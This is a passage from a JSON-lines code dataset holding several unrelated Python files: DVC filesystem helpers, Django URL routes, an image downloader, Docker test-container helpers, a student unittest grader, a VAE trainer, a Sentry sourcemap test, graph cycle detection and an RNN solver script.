fspath\nfrom dvc.utils import fspath_py35\nfrom dvc.utils import relpath\nfrom dvc.utils import walk_files\nfrom dvc.utils.compat import str\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_inode(path):\n inode = System.inode(path)\n logger.debug(\"Path {} inode {}\".format(path, inode))\n return inode\n\n\ndef get_mtime_and_size(path, dvcignore):\n if os.path.isdir(fspath_py35(path)):\n size = 0\n files_mtimes = {}\n for file_path in walk_files(path, dvcignore):\n try:\n stat = os.stat(file_path)\n except OSError as exc:\n # NOTE: broken symlink case.\n if exc.errno != errno.ENOENT:\n raise\n continue\n size += stat.st_size\n files_mtimes[file_path] = stat.st_mtime\n\n # We track file changes and moves, which cannot be detected with simply\n # max(mtime(f) for f in non_ignored_files)\n mtime = dict_md5(files_mtimes)\n else:\n base_stat = os.stat(fspath_py35(path))\n size = base_stat.st_size\n mtime = base_stat.st_mtime\n mtime = int(nanotime.timestamp(mtime))\n\n # State of files handled by dvc is stored in db as TEXT.\n # We cast results to string for later comparisons with stored values.\n return str(mtime), str(size)\n\n\nclass BasePathNotInCheckedPathException(DvcException):\n def __init__(self, path, base_path):\n msg = \"Path: {} does not overlap with base path: {}\".format(\n path, base_path\n )\n super(DvcException, self).__init__(msg)\n\n\ndef contains_symlink_up_to(path, base_path):\n base_path = fspath(base_path)\n path = fspath(path)\n\n if base_path not in path:\n raise BasePathNotInCheckedPathException(path, base_path)\n\n if path == base_path:\n return False\n if System.is_symlink(path):\n return True\n if os.path.dirname(path) == path:\n return False\n return contains_symlink_up_to(os.path.dirname(path), base_path)\n\n\ndef move(src, dst, mode=None):\n \"\"\"Atomically move src to dst and chmod it with mode.\n\n Moving is performed in two stages to make the whole operation atomic in\n case src and dst are on different filesystems and actual physical copying\n of data is happening.\n \"\"\"\n\n src = fspath_py35(src)\n dst = fspath_py35(dst)\n\n dst = os.path.abspath(dst)\n tmp = \"{}.{}\".format(dst, str(uuid()))\n\n if os.path.islink(src):\n shutil.copy(os.readlink(src), tmp)\n os.unlink(src)\n else:\n shutil.move(src, tmp)\n\n if mode is not None:\n os.chmod(tmp, mode)\n\n shutil.move(tmp, dst)\n\n\ndef _chmod(func, p, excinfo):\n perm = os.lstat(p).st_mode\n perm |= stat.S_IWRITE\n\n try:\n os.chmod(p, perm)\n except OSError as exc:\n # broken symlink or file is not owned by us\n if exc.errno not in [errno.ENOENT, errno.EPERM]:\n raise\n\n func(p)\n\n\ndef remove(path):\n path = fspath_py35(path)\n\n logger.debug(\"Removing '{}'\".format(relpath(path)))\n\n try:\n if os.path.isdir(path):\n shutil.rmtree(path, onerror=_chmod)\n else:\n _chmod(os.unlink, path, None)\n except OSError as exc:\n if exc.errno != errno.ENOENT:\n raise\n","sub_path":"dvc/utils/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"289018338","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url('^$', views.index, name='homepage'),\n\n url(r'^login/$', views.login, name='login'),\n url(r'^register/$', views.register, name='register'),\n url(r'^loginout/$', views.loginout, name='loginout'),\n\n url(r'^user-list/$', views.user_list, name='user_list'),\n url(r'^user-add/$', views.user_add, name='user_add'),\n url(r'^user-edit/(?P\\d+)/$', views.user_edit, name='user_edit'),\n url(r'^user-delete/(?P\\d+)/$', views.user_delete, name='user_delete'),\n\n url(r'^get-current-role-req/(?P\\d+)/$', views.get_current_role_req, name='get_current_role'),\n url(r'^set-current-role-req/$', views.set_current_role_req_post, name='set_current_role'),\n\n url(r'^role-list/$', views.role_list, name='role_list'),\n url(r'^role-add/$', views.role_add, name='role_add'),\n url(r'^role-edit/(?P\\d+)/$', views.role_edit, name='role_edit'),\n url(r'^role-delete/(?P\\d+)/$', views.role_delete, name='role_delete'),\n \n url(r'^menu-role-list/$', views.menu_role_list, name='menu_role_list'),\n url(r'^get-tree-by-role-req/(?P\\d+)/$', views.get_tree_by_role_req, name='role_tree_list'),\n\n url(r'^user_role_list_req/(?P\\w+)/$', views.user_role_list_req, name='user_role_list'),\n url(r'^user_role_save_req/$', views.user_role_save_req_post, name='user_role_save'),\n \n]\n","sub_path":"systemmngr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41455080","text":"from sklearn.cluster import AgglomerativeClustering as AC\n#from collections import Counter\n#from matplotlib import pyplot as plt\nimport math, os, hashlib\nimport numpy as np\nimport urllib.request as req\n\nf = open(\"file_new.txt\", 'r')\nStrF = f.read()\nf.close()\nListF = StrF.split()\nListKey = ListF[0::8]\nListKey = [x[10:] for x in ListKey]\nListKey = [\"https://chimera.biomed.kiev.ua/video/pendel-3d/tst.php?res=\" + x.split('/')[0] + \"#\" + x + '/' for x in ListKey]\ndel ListF[0::8]\nListF = [float(x) for x in ListF]\na = 0\nb = 7\nListVal = []\nwhile b <= len(ListF):\n ListVal.append(ListF[a:b])\n a = b\n b = b + 7\n\n# Del NaN and 1\nListKey = [y for x,y in zip(ListVal, ListKey) if not (math.isnan(x[0]) or (x[0] == 1 and x[1] == 1))]\nListVal = [x for x in ListVal if not (math.isnan(x[0]) or (x[0] == 1 and x[1] == 1))]\n\nDictF = {x: y for x, y in zip(ListKey, ListVal)}\n\nprint(len(ListKey))\nfor url in ListKey:\n temp = url.split('tst.php?res=')\n if not os.path.isfile('/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.png'):\n try:\n req.urlretrieve(temp[0] + temp[1][temp[1].index('#')+1:] + 'screenshot1.png', '/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.png')\n except:\n open('/media/roman/10A2FE37A2FE20C0/Clustering2/' + hashlib.sha1(url.encode()).hexdigest() + '.txt','a').close()\n","sub_path":"result/aglomer/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602222638","text":"\"\"\"\nLogic for running containers used for testing dependencies\n\"\"\"\nimport asyncio\nimport logging\nimport socket\nfrom contextlib import asynccontextmanager\nfrom functools import partial as p\n\nimport docker\n\nfrom .util import asyncify\nfrom .wait import wait_for_async\n\nlogging.getLogger(\"elasticsearch\").setLevel(logging.ERROR)\n\n\ndef docker_client():\n 
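\"\"\"Return a Docker client built from the environment (DOCKER_HOST and\n friends) with a 90 second API timeout.\"\"\"\n 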
return docker.client.from_env(timeout=90.0)\n\n\nasync def build_async(*args, **kwargs):\n \"\"\"\n Builds a docker container in an executor so it doesn't block the event loop.\n \"\"\"\n return await asyncio.get_event_loop().run_in_executor(\n None, p(docker_client().images.build, *args, **kwargs)\n )\n\n\ndef tcp_socket_open(host, port):\n \"\"\"\n Returns true if the given host/port is listening for TCP connections\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(2)\n return sock.connect_ex((host, port)) == 0\n\n\ndef container_ip(container):\n \"\"\"\n Returns the IP address of the given container.\n \"\"\"\n container.reload()\n return container.attrs[\"NetworkSettings\"][\"IPAddress\"]\n\n\n@asynccontextmanager\nasync def run_container(image, wait_for_port=None, **kwargs):\n \"\"\"\n Run a container using a context manager, yielding the container object and making sure it is\n shut down when the context is exited.\n \"\"\"\n client = docker_client()\n\n cont = await asyncify(client.containers.run, image, detach=True, **kwargs)()\n\n try:\n assert await wait_for_async(p(container_ip, cont)), \"Container did not get an IP address\"\n\n if wait_for_port:\n assert await wait_for_async(p(tcp_socket_open, container_ip(cont), wait_for_port)), (\n \"TCP port %d did not get opened\" % wait_for_port\n )\n\n yield cont\n finally:\n try:\n print(\"Removing container %s\" % image)\n print(\"Container %s logs:\\n%s\" % (image, cont.logs().decode(\"utf-8\")))\n finally:\n try:\n cont.remove(v=True, force=True)\n except docker.errors.APIError as e:\n print(f\"Error removing container {image}: {e}\")\n","sub_path":"pycommon/remtesting/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36536239","text":"# coding=utf-8\n'''\n# c = 50\n\n\ndef demo():\n c = 50\n for i in range(0, 9):\n c += 1\n print(c)\n\n\n# print(c)\ndemo()\n'''\n\n# Chained scoping: the scope chain is searched level by level, from the innermost scope outward\nc = 1\n'''\ndef func1():\n c = 2\n\n def func2():\n c = 3\n print(c)\n\n func2()\n\n\nfunc1()\n'''\n\n# The global keyword lets code outside the function use a variable assigned inside it\n\n\ndef demo():\n global c\n c = 2\n\n\ndemo()\nprint(c)\n","sub_path":"selflearning/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137660878","text":"#\n# Title: Unittest Template for COS120 Assignments\n# Author: John Luscombe / School Email: john_luscombe@taylor.edu / Personal Email: jluscombe96@gmail.com\n# Version: 2.0\n#\n\nimport unittest\nimport sys\nimport textwrap\nimport random\nfrom io import StringIO\nfrom unittest.mock import patch\nfrom copy import deepcopy\n\ntry:\n from gradetracker import GradeTracker\nexcept:\n print(\"=\"*70)\n print(\"FATAL ERROR\".center(70))\n print(\"=\"*70)\n print('Could not find \"gradetracker.py\".')\n print(textwrap.fill(\"Please make sure it is in the modules directory, or the same directory as this file.\", 70) +\n \"\\n\")\n input(\"\")\n sys.exit()\ntry:\n import L08\nexcept:\n print(\"=\"*70)\n print(\"FATAL ERROR\".center(70))\n print(\"=\"*70)\n print(textwrap.fill(\"An unknown error occurred when running the unit tests. Try the following to fix the \" +\n \"problem:\", 70)+\"\\n\")\n print(textwrap.fill(\"1. Run your Python source code. Resolve any errors that may appear.\", 70)+\"\\n\")\n print(textwrap.fill('2. Look at the top of your window. 
Does it say \"L08\" (not \"L08 Starter' +\n 'Code\")? If not, close out of your window, rename it to \"L08\", and run the tests' +\n 'again.', 70)+\"\\n\")\n print(textwrap.fill(\"3. Make sure your source code is running in the same directory as the unit test file. You\" +\n \"can verify this by looking in the title bar of your IDLE window.\", 70)+\"\\n\")\n print(textwrap.fill(\"If you continue having problems, please contact a TA.\", 70)+\"\\n\")\n input(\"\")\n sys.exit()\n\n\nclass AssignmentInfo:\n PROBLEM_NAMES = [\"printContents\", \"getKeyValuePairs\", \"printSortedByKey\", \"printSortedByValue\",\n \"addToList\", \"addKeyValue\", \"findValue\", \"valueInList\", \"sortList\", \"mergeLists\",\n \"mergeLists2\", \"plotPoints\", \"createNewValuesD\"]\n PROBLEM_VALUES = [1.0, 1.0, 1.0, 6.0, 1.0, 1.0, 5.0, 5.0, 15.0, 20.0, 5.0, 20.0, 19.0]\n MANUAL_PROBLEMS = [\"plotPoints\"]\n PROBLEMS_CHECK_REQUIRED = [\"valueInList\", \"sortList\", \"mergeLists\"]\n HINTS = [\n [\"addToList, addKeyValue, and valueInList\", [5, 6, 7], \"Are you assuming that the entered value is going to\" +\n \" be an integer? What if the user tries to enter a\" +\n \" string?\"],\n [\"Sorting List Problems\", [9, 10], \"Try to think through this problem by getting out a pencil and paper or\" +\n \" going to the whiteboard, and think about how you would sort an unsorted\" +\n \" list by hand. This might give you a clue as to how to do it on the\" +\n \" computer.\"]\n ]\n QUOTE = '\"It always seems impossible until it\\'s done.\" ~Nelson Mandela'\n\n\nclass Helper:\n w = [83, 99, 2, 3, 1, 7, 54, 1]\n x = [23, 12, 67, 5, 4, 11, 2, 84, 12, 16]\n y = {\"staplers\": 2, \"pencils\": 45, \"erasers\": 12, \"paper clips\": 200, \"pens\": 84, \"markers\": 12}\n z = {23012: 2, 77321: 5, 32332: 234, 77656: 16, 21321: 802, 99876: 3}\n\n @staticmethod\n def getRandomFiveCharacterString():\n string = \"\"\n for i in range(5):\n string += chr(random.randint(65, 122))\n return string\n\n @staticmethod\n def getRandomList():\n lst = []\n for i in range(3):\n lst.append(Helper.getRandomFiveCharacterString())\n return lst\n\n @staticmethod\n def getRandomNumList():\n lst = []\n for i in range(5):\n lst.append(random.randint(0, 100))\n return lst\n\n @staticmethod\n def getRandomDictionary():\n d = {}\n for i in range(3):\n key = Helper.getRandomFiveCharacterString()\n value = random.randint(0, 100)\n d[key] = value\n return d\n\n @staticmethod\n def getListOfRandomLists(listOfLists=None):\n if listOfLists is None:\n listOfLists = []\n for i in range(50):\n listOfLists.append(Helper.getRandomList())\n for i in range(50):\n listOfLists.append(Helper.getRandomNumList())\n return listOfLists\n\n @staticmethod\n def getListOfRandomDicts(listOfDicts=None):\n if listOfDicts is None:\n listOfDicts = []\n for i in range(100):\n listOfDicts.append(Helper.getRandomDictionary())\n return listOfDicts\n\n @staticmethod\n def buildStringFromList(lst):\n string = \"\"\n for item in lst:\n string += str(item) + \"\\n\"\n return string[:-1]\n\n @staticmethod\n def buildStringFromDict(d, sortBy=\"\"):\n if sortBy.lower() == \"key\":\n return Helper._buildStringFromDictSortedByKey(d)[:-1]\n elif sortBy.lower() == \"value\":\n return Helper._buildStringFromDictSortedByValue(d)[:-1]\n else:\n return Helper._buildStringFromDictNoSort(d)[:-1]\n\n @staticmethod\n def _buildStringFromDictSortedByKey(d):\n string = \"\"\n keys = sorted(list(d.keys()))\n for key in keys:\n value = d[key]\n string += \"%s %s\\n\" % (key, value)\n return string\n\n @staticmethod\n 
def _buildStringFromDictSortedByValue(d):\n string = \"\"\n keys = list(d.keys())\n values = sorted(list(d.values()))\n processedKeys = []\n for value in values:\n for key in keys:\n if d[key] == value and key not in processedKeys:\n string += \"%s %s\\n\" % (key, value)\n processedKeys.append(key)\n return string\n\n @staticmethod\n def _buildStringFromDictNoSort(d):\n string = \"\"\n for key in d:\n value = d[key]\n string += \"%s %s\\n\" % (key, value)\n return string\n\n @staticmethod\n def standardizeBoolean(obj):\n if obj is True:\n return True\n elif obj is False:\n return False\n elif isinstance(obj, str) and obj.lower() == \"true\":\n return True\n elif isinstance(obj, str) and obj.lower() == \"false\":\n return False\n else:\n raise ValueError(\"Expected True or False, got %s\" % obj)\n\n @staticmethod\n def standardizeDictOutput(string):\n finalString = \"\"\n lines = string.split(\"\\n\")\n for line in lines:\n if \" : \" in line:\n lineProperForm = line.split(\" : \")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \": \" in line:\n lineProperForm = line.split(\": \")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \" :\" in line:\n lineProperForm = line.split(\" :\")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n elif \":\" in line:\n lineProperForm = line.split(\":\")\n finalString += \" \".join(lineProperForm) + \"\\n\"\n else:\n finalString += line + \"\\n\"\n\n return finalString\n\n @staticmethod\n def createNewValuesDAnswer(aDict):\n newDict = {}\n values = list(aDict.values())\n for value in values:\n if values.count(value) > 1:\n return {}\n for key in aDict:\n newDict[aDict[key]] = key\n return newDict\n\n\nclass Unittests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n problemNames = AssignmentInfo.PROBLEM_NAMES\n problemValues = AssignmentInfo.PROBLEM_VALUES\n manualProblems = AssignmentInfo.MANUAL_PROBLEMS\n problemsCheckRequired = AssignmentInfo.PROBLEMS_CHECK_REQUIRED\n hints = AssignmentInfo.HINTS\n quote = AssignmentInfo.QUOTE\n cls.gradeTracker = GradeTracker(problemNames, problemValues, manualProblems,\n problemsCheckRequired, hints, quote)\n\n def setUp(self):\n self.saved_stdout = sys.stdout\n self.out = StringIO()\n sys.stdout = self.out\n\n def tearDown(self):\n sys.stdout = self.saved_stdout\n\n @classmethod\n def tearDownClass(cls):\n cls.gradeTracker.printReport()\n\n def getOutput(self):\n output = self.out.getvalue().strip()\n self.out = StringIO()\n sys.stdout = self.out\n return output\n\n def forcePrint(self, obj):\n sys.stdout = self.saved_stdout\n print(obj)\n self.out = StringIO()\n sys.stdout = self.out\n\n def test_printContents(self):\n listOfLists = [Helper.w, Helper.x]\n for lst in Helper.getListOfRandomLists(listOfLists):\n L08.printContents(lst[:])\n studentAnswer = self.getOutput()\n correctAnswer = Helper.buildStringFromList(lst)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s\" % lst)\n\n self.gradeTracker.setCorrect(1)\n\n def test_getKeyValuePairs(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n studentAnswer = L08.getKeyValuePairs(deepcopy(d))\n correctAnswer = sorted(list(d.items()))\n self.assertEqual(sorted(studentAnswer), correctAnswer, \"Failed with dictionary %s\" % d)\n self.assertTrue(isinstance(studentAnswer, list), \"Result not converted to list\")\n\n self.gradeTracker.setCorrect(2)\n\n def test_printSortedByKey(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in 
Helper.getListOfRandomDicts(listOfDicts):\n L08.printSortedByKey(deepcopy(d))\n studentAnswer = self.getOutput()\n studentAnswer = Helper.standardizeDictOutput(studentAnswer)\n correctAnswer = Helper.buildStringFromDict(d, sortBy=\"key\")\n correctAnswer = Helper.standardizeDictOutput(correctAnswer)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(3)\n\n def test_printSortedByValue(self):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n L08.printSortedByValue(deepcopy(d))\n studentAnswer = self.getOutput()\n studentAnswer = Helper.standardizeDictOutput(studentAnswer)\n correctAnswer = Helper.buildStringFromDict(d, sortBy=\"value\")\n correctAnswer = Helper.standardizeDictOutput(correctAnswer)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(4)\n\n @patch('builtins.input')\n def test_addToList(self, ipt):\n for lst in Helper.getListOfRandomLists():\n randomString = Helper.getRandomFiveCharacterString()\n ipt.return_value = randomString\n studentAnswer = L08.addToList(lst[:])\n correctAnswer = lst[:] + [randomString]\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s and input %s\" % (lst, randomString))\n\n self.gradeTracker.setCorrect(5)\n\n @patch('builtins.input')\n def test_addKeyValue(self, ipt):\n for d in Helper.getListOfRandomDicts():\n key = Helper.getRandomFiveCharacterString()\n value = Helper.getRandomFiveCharacterString()\n ipt.side_effect = [key, value]\n studentAnswer = L08.addKeyValue(deepcopy(d))\n correctAnswer = deepcopy(d)\n correctAnswer[key] = value\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s, key %s, and value %s\" %\n (d, key, value))\n\n self.gradeTracker.setCorrect(6)\n\n @patch('builtins.input')\n def test_findValue(self, ipt):\n listOfDicts = [Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n ipt.side_effect = list(d.keys()) + [\"key not in dictionary\"]\n for key in d.keys():\n studentAnswer = L08.findValue(deepcopy(d))\n self.assertEqual(studentAnswer, d[key], \"Failed with dictionary %s and input %s\" % (d, key))\n studentAnswer = L08.findValue(d)\n self.assertIsNotNone(studentAnswer, 'Does not print \"No such value\" when a key is not in the given' +\n ' dictionary')\n\n self.gradeTracker.setCorrect(7)\n\n @patch('builtins.input')\n def test_valueInList(self, ipt):\n listOfLists = [Helper.w[:], Helper.x[:]]\n for lst in Helper.getListOfRandomLists(listOfLists):\n ipt.side_effect = lst[:] + [\"item not in list\"]\n for item in lst:\n studentAnswer = L08.valueInList(lst[:])\n studentAnswer = Helper.standardizeBoolean(studentAnswer)\n self.assertTrue(studentAnswer, 'Failed with list %s and input %s' % (lst, item))\n studentAnswer = L08.valueInList(lst[:])\n studentAnswer = Helper.standardizeBoolean(studentAnswer)\n self.assertFalse(studentAnswer, \"Does not return the proper value when a value is not in the list\")\n\n self.gradeTracker.setCorrect(8)\n\n def test_sortList(self):\n listOfLists = [Helper.w[:], Helper.x[:]]\n for lst in Helper.getListOfRandomLists(listOfLists):\n studentAnswer = L08.sortList(lst[:])\n correctAnswer = sorted(lst)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with list %s\" % lst)\n\n self.gradeTracker.setCorrect(9)\n\n def test_mergeLists(self):\n listOfLists = [[1, 3, 5, 7], [2, 4, 6, 8], [1, 3], [2, 4, 6, 8, 10], Helper.w[:], Helper.x[:]]\n for i in range(50):\n 
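# Pad the fixed cases with random numeric lists; each pair below is\n            # sorted and randomly trimmed, and the expected merge is simply\n            # sorted(list1 + list2).\n            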
listOfLists.append(Helper.getRandomNumList())\n for idx in range(0, len(listOfLists), 2):\n list1 = sorted(listOfLists[idx])\n list2 = sorted(listOfLists[idx+1])\n for i in range(random.randint(0, len(list1))):\n list1.pop()\n for i in range(random.randint(0, len(list2))):\n list2.pop()\n studentAnswer = L08.mergeLists(list1[:], list2[:])\n correctAnswer = sorted(list1 + list2)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with lists %s and %s\" % (list1, list2))\n\n self.gradeTracker.setCorrect(10)\n\n def test_mergeLists2(self):\n listOfLists = [[1, 3, 5, 7], [2, 4, 6, 8], [1, 3], [2, 4, 6, 8, 10], Helper.w[:], Helper.x[:]]\n for i in range(50):\n listOfLists.append(Helper.getRandomNumList())\n for idx in range(0, len(listOfLists), 2):\n list1 = sorted(listOfLists[idx])\n list2 = sorted(listOfLists[idx+1])\n for i in range(random.randint(0, len(list1))):\n list1.pop()\n for i in range(random.randint(0, len(list2))):\n list2.pop()\n studentAnswer = L08.mergeLists2(list1[:], list2[:])\n correctAnswer = sorted(list1 + list2)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with lists %s and %s\" % (list1, list2))\n\n self.gradeTracker.setCorrect(11)\n\n def test_createNewValuesD(self):\n listOfDicts = [{\"a\": 5, \"b\": 12, \"k\": 13}, Helper.y, Helper.z]\n for d in Helper.getListOfRandomDicts(listOfDicts):\n studentAnswer = L08.createNewValuesD(deepcopy(d))\n correctAnswer = Helper.createNewValuesDAnswer(d)\n self.assertEqual(studentAnswer, correctAnswer, \"Failed with dictionary %s\" % d)\n\n self.gradeTracker.setCorrect(13)\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=0)\n","sub_path":"L08/L08Test.py","file_name":"L08Test.py","file_ext":"py","file_size_in_byte":15605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54653579","text":"#%%\nfrom __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom visdom import Visdom\n\nfrom modules import VAE\nfrom train_test import train\nfrom train_test import test\nimport utils\n\n\n#%%\nlog_interval = 100\nseed = 1\n\ntorch.manual_seed(seed)\n\nfrom chosen_gpu import get_freer_gpu\ndevice = torch.device(get_freer_gpu())\nprint(\"Configured device: \", device)\n\n#%%\n\ncompose = transforms.Compose(\n [\n transforms.Resize((64,64)),\n transforms.ToTensor(),\n #transforms.Normalize((.5, .5, .5), (.5, .5, .5))\n ])\n\nds = torchvision.datasets.ImageFolder(root='dataset/', transform=compose)\n\nratio = [int(len(ds)*0.7), len(ds) - int(len(ds)*0.7)]\n\ntrain_dataset, test_dataset = torch.utils.data.random_split(ds, ratio)\n\nbatch_size=4\n\ntrain_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,\n shuffle=True, num_workers=1, pin_memory=True)\ntest_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,\n shuffle=False,num_workers=1, pin_memory=True)\nprint('train_loader', len(train_loader))\nprint('test_loader', len(test_loader))\n\n#%%\nmodel = VAE().to(device)\n# optimizer = optim.Adam(model.parameters(), lr=1e-3)\noptimizer = optim.Adam(model.parameters(), lr=1e-3, betas = (0.9,0.999), weight_decay = 0.0005)\n\n#%%\nepochs = 100\nviz = Visdom() \nglobal plotter, recon\nplotter = utils.VisdomLinePlotter(env_name='main')\nsample_image = utils.VisdomImage(env_name='main')\nrecon = 
utils.VisdomImage(env_name='main')\n\nfor epoch in range(1, epochs + 1):\n with torch.no_grad():\n sample = torch.randn(32,32).to(device)\n sample = model.decode(sample).cpu()\n print(\"save image: \" + 'results/sample_' + str(epoch) + '.png')\n save_image(sample, 'results/sample_' + str(epoch) + '.png')\n sample_image.display_image(sample, 0, 'SAMPLE RECON')\n train(batch_size, epoch, model, train_loader, device, optimizer, plotter)\n test(batch_size, epoch, model, test_loader, device, optimizer, plotter, recon)","sub_path":"09-VAEs/AIT_ICT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112542085","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nimport os\nimport json\nimport responses\n\nfrom sentry.testutils import TestCase\nfrom sentry.models import Event\n\n\ndef get_fixture_path(name):\n return os.path.join(os.path.dirname(__file__), 'example-project', name)\n\n\ndef load_fixture(name):\n with open(get_fixture_path(name)) as f:\n return f.read()\n\n\nclass ExampleTestCase(TestCase):\n @responses.activate\n def test_sourcemap_expansion(self):\n responses.add(\n responses.GET,\n 'http://example.com/test.js',\n body=load_fixture('test.js'),\n content_type='application/javascript'\n )\n responses.add(\n responses.GET,\n 'http://example.com/test.min.js',\n body=load_fixture('test.min.js'),\n content_type='application/javascript'\n )\n responses.add(\n responses.GET,\n 'http://example.com/test.map',\n body=load_fixture('test.map'),\n content_type='application/json'\n )\n responses.add(responses.GET, 'http://example.com/index.html', body='Not Found', status=404)\n\n data = {\n 'message': 'hello',\n 'platform': 'javascript',\n 'sentry.interfaces.Exception': {\n 'values': [\n {\n 'type': 'Error',\n 'stacktrace': {\n 'frames': json.loads(load_fixture('minifiedError.json'))[::-1],\n },\n }\n ],\n }\n }\n\n resp = self._postWithHeader(data)\n assert resp.status_code == 200\n\n event = Event.objects.get()\n\n exception = event.interfaces['sentry.interfaces.Exception']\n frame_list = exception.values[0].stacktrace.frames\n\n assert len(frame_list) == 4\n\n assert frame_list[0].function == 'produceStack'\n assert frame_list[0].lineno == 6\n assert frame_list[0].filename == 'index.html'\n\n # This function name is obviously wrong but the current logic we\n # have does not permit better data here\n assert frame_list[1].function == 'i'\n assert frame_list[1].lineno == 20\n assert frame_list[1].filename == 'test.js'\n\n assert frame_list[2].function == 'invoke'\n assert frame_list[2].lineno == 15\n assert frame_list[2].filename == 'test.js'\n\n # This function name is obviously wrong but the current logic we\n # have does not permit better data here\n assert frame_list[3].function == 'cb'\n assert frame_list[3].lineno == 5\n assert frame_list[3].filename == 'test.js'\n","sub_path":"tests/sentry/lang/javascript/test_example.py","file_name":"test_example.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53026477","text":"from collections import defaultdict\n\n\nclass Graph:\n def __init__(self, num_of_vertices):\n self.V = num_of_vertices\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n def isCycleInDFS(self, u, visited, recursive_stack):\n\n visited[u] = True\n recursive_stack[u] = True\n\n for v in self.graph[u]:\n 
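# recursive_stack marks the vertices on the current DFS path; meeting one\n            # of them again means a back edge, i.e. a directed cycle.\n            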
if recursive_stack[v] is True:\n return True\n if not visited[v]:\n if self.isCycleInDFS(v, visited, recursive_stack):\n return True\n\n recursive_stack[u] = False\n return False\n\n def isCyclePresent(self):\n\n if not self.graph:\n return False\n\n visited = [False] * self.V\n recursive_stack = [False] * self.V\n\n # Call the recursive helper function to detect cycle in different\n # DFS trees\n for i in range(self.V):\n if visited[i] is False:\n if self.isCycleInDFS(i, visited, recursive_stack) is True:\n return True\n return False\n\n\ng = Graph(6)\ng.addEdge(5, 2)\ng.addEdge(5, 0)\ng.addEdge(2, 0)\ng.addEdge(0, 3)\ng.addEdge(4, 1)\ng.addEdge(3, 2)\ng.addEdge(3, 1)\nprint(g.isCyclePresent())\n","sub_path":"is_cycle_present_in_directed_graph_without_colors.py","file_name":"is_cycle_present_in_directed_graph_without_colors.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607987428","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 17 13:01:52 2019\r\n@author: shankar\r\n\"\"\"\r\nimport numpy as np\r\nfrom anytree import Node\r\nimport matplotlib.pyplot as plt\r\nfrom Definitions import *\r\n\r\nBLANK_INPUT = 0\r\nSIGNAL_INPUT = 0.1\r\nstart_h_value = np.random.random_sample()\r\n\r\nResNet_weights = [-2, 0.1]\r\nGRU_weights = np.reshape(2*np.random.random_sample((6, 1)) - 1,(1,6))[0] #Wz,Uz,Wr,Ur,Wh,Uh\r\n\r\n\r\nsolver_initial_ResNet = [-100,0,100]\r\nsolver_initial_GRU = [-1, -0.8, -0.6, -0.4, -0.2, 0, 0.2, 0.4, 0.6, 0.8, 1]\r\n\r\n\r\n\"\"\" Select what RNN to use \"\"\"\r\nRNN_weights = list(GRU_weights)\r\nsolver_initial = solver_initial_GRU\r\nbackward_equation = bwd_GRU\r\nfwd_equation = fwd_GRU\r\n\r\n\r\nN = 5\r\nstart = Node(\"h=\"+str(start_h_value),parent=None,children=None,value=start_h_value,time_step=1)\r\n\r\ndef expand_tree(root):\r\n h_kk = root.value\r\n x_k = BLANK_INPUT\r\n #params = [h_kk,x_k,W,U]\r\n params = [h_kk,x_k] + RNN_weights\r\n if(root.time_step == N):\r\n return\r\n else:\r\n sols = get_solutions(backward_equation,solver_initial,params);\r\n for x in sols:\r\n 